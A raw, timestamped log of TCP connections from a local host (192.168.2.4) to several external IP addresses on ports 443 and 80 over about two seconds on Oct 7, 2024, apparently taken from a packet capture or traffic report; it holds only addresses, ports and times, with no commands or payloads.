                                                                                                                                      Oct 7, 2024 03:23:23.558974028 CEST4436103913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.559242010 CEST61040443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.559256077 CEST4436104013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.577359915 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.577682018 CEST61042443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.577687979 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.578296900 CEST61042443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.578299999 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.653322935 CEST4436104113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.653789043 CEST4436104113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.653846025 CEST61041443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.653876066 CEST61041443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.653887987 CEST4436104113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.653896093 CEST61041443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.653901100 CEST4436104113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.656172991 CEST4436104013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.656760931 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.656837940 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.656945944 CEST4436104013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.656991005 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.656991959 CEST4436104013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.657021999 CEST61040443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.657057047 CEST61040443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.657085896 CEST61040443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.657114029 CEST4436104013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.657139063 CEST61040443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.657151937 CEST4436104013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.657288074 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.657322884 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.658639908 CEST4436103913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.658804893 CEST4436103913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.658871889 CEST61039443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.658935070 CEST61039443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.658958912 CEST4436103913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.658982992 CEST61039443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.658996105 CEST4436103913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.659456968 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.659483910 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.659728050 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.659862995 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.659887075 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.661847115 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.661870003 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.661936045 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.662031889 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.662053108 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.677195072 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.677246094 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.677364111 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.677370071 CEST61042443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.677418947 CEST61042443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.677457094 CEST61042443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.677463055 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.677484035 CEST61042443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.677486897 CEST4436104213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.679605007 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.679642916 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.679764986 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.679888964 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.679929972 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.707185984 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.707535982 CEST61044443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.707549095 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.708054066 CEST61044443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.708060026 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.808233023 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.808268070 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.808300972 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.808341980 CEST61044443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.808445930 CEST61044443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.808464050 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.808475971 CEST61044443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.808482885 CEST4436104413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.810781956 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.810862064 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.811000109 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.811158895 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:23.811193943 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.854311943 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.854696989 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.854736090 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.855838060 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.855906010 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.856856108 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.856930017 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.857665062 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.857753992 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.857825994 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.899424076 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.906687021 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.906702995 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.955439091 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:23.986646891 CEST44361043104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.986709118 CEST44361043104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.987082005 CEST61043443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:23:23.987222910 CEST61043443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:23:23.987267017 CEST44361043104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.987293959 CEST61043443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:23:23.987310886 CEST44361043104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.168407917 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.168550014 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.168617964 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.168653965 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.168688059 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.168750048 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.168766022 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.168821096 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.175765991 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.175827026 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.180882931 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.180953979 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.180974960 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.181022882 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.186835051 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.186897039 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.193124056 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.193195105 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.193212032 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.193274021 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.256656885 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.256750107 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.256778955 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.256846905 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.257600069 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.257678032 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.263744116 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.263803959 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.263837099 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.263895035 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.269989014 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.270066977 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.276245117 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.276313066 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.276331902 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.282608986 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.282663107 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.282680988 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.288964033 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.289028883 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.289041996 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.289266109 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.289331913 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.289509058 CEST61045443192.168.2.4142.250.184.238
                                                                                                                                      Oct 7, 2024 03:23:24.289537907 CEST44361045142.250.184.238192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.292218924 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.294224024 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.296581030 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.342796087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.342856884 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:24.346374989 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.347485065 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.347502947 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.347532034 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.391165018 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.456875086 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.499227047 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.586986065 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:24.587057114 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.587132931 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:24.587462902 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:24.587492943 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.630203009 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:24.630284071 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.630371094 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:24.630583048 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:24.630604029 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.674305916 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.674352884 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.674858093 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.674870968 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.675050974 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.675086975 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.675467014 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.675477982 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.675596952 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.675621033 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.675987959 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.676001072 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.676270008 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.676310062 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.676714897 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.676727057 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.677057028 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.677076101 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.677386999 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.677396059 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.771331072 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.771411896 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.771449089 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.771511078 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.772305965 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.772382021 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.772558928 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.772641897 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.772700071 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.772747040 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.772932053 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.772991896 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.773067951 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.773117065 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.773153067 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.773199081 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.779762030 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.779926062 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.780004025 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.781145096 CEST61048443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.781172037 CEST4436104813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.781610012 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.781610966 CEST61049443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.781639099 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.781666040 CEST4436104913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.781737089 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.781737089 CEST61052443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.781764030 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.781785011 CEST4436105213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.782433033 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.782449961 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.782474041 CEST61051443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.782486916 CEST4436105113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.795341015 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.795358896 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.795397997 CEST61050443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.795411110 CEST4436105013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.798099041 CEST6103880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:24.798584938 CEST6105780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:24.802859068 CEST61058443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.802871943 CEST4436105813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.803152084 CEST61058443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.803153992 CEST8061038185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.803306103 CEST6103880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:24.803407907 CEST8061057185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.803518057 CEST6105780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:24.805921078 CEST61059443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.805963993 CEST4436105913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.806071997 CEST61059443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.806268930 CEST61060443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.806302071 CEST4436106013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.806413889 CEST61060443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.808856010 CEST61061443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.808914900 CEST4436106113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.808964968 CEST61062443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.808995962 CEST4436106213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.809035063 CEST61061443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.809087038 CEST61062443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.809350014 CEST61062443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.809379101 CEST4436106213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.809483051 CEST61061443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.809505939 CEST4436106113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.809667110 CEST61058443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.809679985 CEST4436105813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.809923887 CEST6105780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:24.811194897 CEST61059443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.811213017 CEST4436105913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.811368942 CEST61060443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:24.811388969 CEST4436106013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.814717054 CEST8061057185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.218133926 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.218420029 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.218449116 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.218964100 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.219044924 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.219990015 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.220058918 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.224090099 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.224185944 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.224287033 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.267487049 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.268258095 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.268316031 CEST44361054172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.272483110 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.289869070 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.289920092 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.291410923 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.291498899 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.293920994 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.293982029 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.294769049 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.294987917 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.295252085 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.314117908 CEST61054443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.339402914 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.345603943 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.345640898 CEST44361055172.217.16.206192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.391154051 CEST61055443192.168.2.4172.217.16.206
                                                                                                                                      Oct 7, 2024 03:23:25.451478958 CEST4436105913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.456893921 CEST61059443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:25.456909895 CEST4436105913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.460403919 CEST4436106113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.462454081 CEST61059443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:25.462460041 CEST4436105913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.465786934 CEST4436105813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.466507912 CEST4436106013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.468719006 CEST4436106213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.468831062 CEST61058443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:25.468847990 CEST4436105813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.469264984 CEST61058443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:25.469270945 CEST4436105813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.470642090 CEST61062443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:25.470674992 CEST4436106213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:25.471297979 CEST61062443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:25.471306086 CEST4436106213.107.246.45192.168.2.4
